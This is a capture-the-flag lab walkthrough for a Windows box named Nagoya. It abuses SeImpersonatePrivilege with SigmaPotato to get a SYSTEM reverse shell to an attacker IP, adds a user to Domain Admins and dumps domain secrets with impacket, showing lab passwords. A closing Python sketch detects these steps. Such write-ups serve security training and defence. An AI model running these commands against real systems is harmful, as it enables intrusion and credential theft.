SigmaPotato


The compromised svc_mssql account holds both SeAssignPrimaryTokenPrivilege and SeImpersonatePrivilege, which makes the target system vulnerable to the potato exploits. I will be using the newest potato exploit, SigmaPotato.

This gaudy repository is a derivative of the GodPotato project, aiming to enhance the original work’s functionality and user-friendliness. With my bread-and-butter generally being PowerShell implementation and visual formatting, the primary focus is on enhancing PowerShell support and output verbosity for a more intuitive and effective user experience.

Exploit


Exploit binary is available online

Exploitation


*Evil-WinRM* PS C:\tmp> upload SigmaPotato.exe
 
Info: Uploading /home/kali/PEN-200/PG_PRACTICE/nagoya/SigmaPotato.exe to C:\tmp\SigmaPotato.exe
Data: 84648 bytes of 84648 bytes copied
Info: Upload successful!

Delivery complete

PS C:\tmp> .\SigmaPotato.exe --revshell 192.168.45.220 1234
[+] Starting Pipe Server...
[+] Created Pipe Name: \\.\pipe\SigmaPotato\pipe\epmapper
[+] Pipe Connected!
[+] Impersonated Client: NT AUTHORITY\NETWORK SERVICE
[+] Searching for System Token...
[+] PID: 884 | Token: 0x800 | User: NT AUTHORITY\SYSTEM
[+] Found System Token: True
[+] Duplicating Token...
[+] New Token Handle: 968
[+] Current Command Length: 10 characters
---
[+] Creating a simple PowerShell reverse shell...
[+] IP Address: 192.168.45.220 | Port: 1234
[+] Bootstrapping to an environment variable...
[+] Payload base64 encoded and set to local environment variable: '$env:SigmaBootstrap'
[+] Environment block inherited local environment variables.
[+] New Command to Execute: 'powershell -c (powershell -e $env:SigmaBootstrap)'
[+] Setting 'CREATE_UNICODE_ENVIRONMENT' process flag.
---
[+] Creating Process via 'CreateProcessAsUserW'
[+] Process Started with PID: 2264
 
[+] Process Output:

Invoking

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nagoya]
└─$ nnc 1234    
listening on [any] 1234 ...
connect to [192.168.45.220] from (UNKNOWN) [192.168.158.21] 50446
 
PS C:\tmp> whoami
nt authority\system
PS C:\tmp> hostname
nagoya
PS C:\tmp> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0:
 
   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 192.168.158.21
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.158.254

System Level Compromise

Hashdump


PS C:\tmp> net groups /DOMAIN "Domain Admins" /ADD andrea.hayes
The command completed successfully.

Making andrea.hayes a Domain Admin

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nagoya]
└─$ impacket-getTGT NAGOYA-INDUSTRIES.COM/andrea.hayes@nagoya.nagoya-industries.com -dc-ip $IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
Password: Nagoya2023
[*] Saving ticket in andrea.hayes@nagoya.nagoya-industries.com.ccache

Updating the TGT

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nagoya]
└─$ KRB5CCNAME=andrea.hayes@nagoya.nagoya-industries.com.ccache impacket-secretsdump NAGOYA-INDUSTRIES.COM/andrea.hayes@nagoya.nagoya-industries.com -no-pass -k -dc-ip $IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
[*] Target system bootKey: 0x3382196796b8ecc982e9eb6e08fd3689
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
[*] DPAPI_SYSTEM 
[*] NL$KM 
[*] _SC_MSSQL$SQLEXPRESS 
NAGOYA-IND\svc_mssql:Service1
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[*] Kerberos keys grabbed
[*] Cleaning up... 

Domain level compromise
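
Each stage above leaves a trace a defender can match on: the look-alike epmapper pipe, the SYSTEM process spawned from the svc_mssql session, the Domain Admins change, and DRSUAPI replication by a user account. The following is an added detection sketch, not part of the original write-up or of the SigmaPotato project; the event dictionaries are constructed, and their field names are assumptions modelled on Sysmon events 1 and 17 and Security events 4728 and 4662.

```python
import re

# DS-Replication-Get-Changes and -Get-Changes-All control access right GUIDs.
REPL_GUIDS = ("1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",
              "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2")
SYSTEM = r"nt authority\system"

def detect(ev):
    """Return the names of the rules one normalized event matches."""
    hits, eid = [], ev.get("id")
    if eid == 17:    # pipe created
        # The real endpoint mapper pipe is \epmapper; \<name>\pipe\epmapper
        # is the look-alike served by the tool's pipe server.
        if re.fullmatch(r"\\[^\\]+\\pipe\\epmapper", ev.get("PipeName", ""), re.I):
            hits.append("fake_epmapper_pipe")
    elif eid == 1:   # process created
        user, parent = ev.get("User", "").lower(), ev.get("ParentUser", "").lower()
        if user == SYSTEM and parent and parent != SYSTEM:
            hits.append("system_child_of_non_system_parent")
        # -e / -enc / -EncodedCommand fed from an environment variable
        if re.search(r"powershell(\.exe)?\s+-e\w*\s+\$env:", ev.get("CommandLine", ""), re.I):
            hits.append("encoded_powershell_from_env_var")
    elif eid == 4728:  # member added to a security-enabled global group
        if ev.get("Group", "").lower() == "domain admins":
            hits.append("domain_admins_member_added")
    elif eid == 4662:  # operation performed on a directory object
        props = ev.get("Properties", "").lower()
        # Domain controllers replicate as machine accounts (name ends in $).
        if any(g in props for g in REPL_GUIDS) and not ev.get("Subject", "").endswith("$"):
            hits.append("replication_by_non_machine_account")
    return hits

# Constructed sample events; field names are assumptions modelled on Sysmon
# (1, 17) and the Security log (4728, 4662), values taken from the write-up.
EVENTS = [
    {"id": 17, "PipeName": r"\SigmaPotato\pipe\epmapper"},
    {"id": 17, "PipeName": r"\epmapper"},
    {"id": 1, "User": r"NT AUTHORITY\SYSTEM", "ParentUser": r"NAGOYA-IND\svc_mssql",
     "CommandLine": "powershell -c (powershell -e $env:SigmaBootstrap)"},
    {"id": 1, "User": r"NT AUTHORITY\SYSTEM", "ParentUser": r"NT AUTHORITY\SYSTEM",
     "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs"},
    {"id": 4728, "Group": "Domain Admins", "Member": "andrea.hayes"},
    {"id": 4662, "Subject": "andrea.hayes",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"id": 4662, "Subject": "NAGOYA$",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
]

def triage(events):
    # Map event index -> matched rules, skipping events with no match.
    return {i: h for i, ev in enumerate(events) if (h := detect(ev))}

if __name__ == "__main__":
    for i, hits in triage(EVENTS).items():
        print(i, hits)
```

Event 4662 is only written when directory service access auditing is enabled on the domain controller, and accounts that replicate legitimately under a user identity need an allow-list in front of the last rule.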